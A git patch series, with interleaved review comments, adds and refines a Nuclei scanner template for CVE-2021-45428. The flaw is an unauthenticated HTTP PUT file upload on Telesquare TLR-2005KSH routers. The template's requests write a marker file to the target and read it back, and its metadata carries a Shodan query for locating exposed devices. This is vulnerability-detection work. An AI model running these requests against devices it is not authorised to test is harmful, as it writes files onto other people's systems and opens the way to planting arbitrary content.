From 7e811151b5602369ce1c7d5d9344b4677f5eb964 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Thu, 19 May 2022 08:38:13 +0900
Subject: [PATCH 1/2] Create CVE-2021-45428.yaml
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
Signed-off-by: GwanYeong Kim
---
cves/2021/CVE-2021-45428.yaml | 45 +++++++++++++++++++++++++++++++++++
1 file changed, 45 insertions(+)
create mode 100644 cves/2021/CVE-2021-45428.yaml
diff --git a/cves/2021/CVE-2021-45428.yaml b/cves/2021/CVE-2021-45428.yaml
new file mode 100644
index 0000000000..d4c5d9984f
--- /dev/null
+++ b/cves/2021/CVE-2021-45428.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-45428
+
+info:
+ name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
+ author: gy741
+ severity: critical
+ description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
+ - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
+ - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45428
+ cwe-id: CWE-639
+ metadata:
+ shodan-query: http.html:"TLR-2005KSH"
+ verified: "true"
+ tags: cve,cve2021,telesquare
+
+requests:
+ - raw:
+ - |
+ GET /nuclei.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ PUT /nuclei.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ nuclei
+
+ - |
+ GET /nuclei.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200"
+
+# Enhanced by mp on 2022/05/19
From 8cc82f868eac38bfa031610242cc04c9c81955fd Mon Sep 17 00:00:00 2001
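Review bot: The `cvss-metrics` vector and the `cvss-score` in the `classification` block disagree: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` works out to 9.1 under the CVSS 3.1 base formula, while 9.8 is what the same vector scores with `C:H`. One of the two was probably mistyped, so both should be reconciled with the NVD entry already listed under `reference`, otherwise severity filtering and reporting built on this metadata will be inconsistent. The `description` also carries the typo `THe`. The second patch in this series keeps both the classification values and the typo unchanged.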
From: Prince Chaddha Date: Fri, 20 May 2022 00:44:47 +0530 Subject: [PATCH 2/2] Update CVE-2021-45428.yaml --- cves/2021/CVE-2021-45428.yaml | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-45428.yaml b/cves/2021/CVE-2021-45428.yaml index d4c5d9984f..2d5d7b0404 100644 --- a/cves/2021/CVE-2021-45428.yaml +++ b/cves/2021/CVE-2021-45428.yaml @@ -4,35 +4,36 @@ info: name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload author: gy741 severity: critical - description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + description: | + TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 metadata: + verified: true shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare + tags: cve,cve2021,telesquare,intrusive,fileupload requests: - raw: - | - GET /nuclei.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - | - PUT /nuclei.txt HTTP/1.1 + PUT /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - nuclei + CVE-2021-45428 - | - GET /nuclei.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true 
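Review bot: The PUT in the second raw request writes `{{randstr}}.txt` to the device and nothing in the template removes it or says so, so every positive result leaves a file behind; the new `intrusive` tag signals a write but not what is written. I would document it in the template, for example with a comment above `requests:` such as `# Writes /{{randstr}}.txt containing "CVE-2021-45428" to the target; remove it after verification.` That tells the scan operator what to clean up, and lets the device owner attribute the file and the PUT entry in the access log to an authorised scan. The `requests` entry continues past this hunk into the matchers.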
@@ -40,6 +41,8 @@ requests: matchers: - type: dsl dsl: - - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200" + - 'status_code_1 == 404 && status_code_2 == 201' + - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' + condition: and # Enhanced by mp on 2022/05/19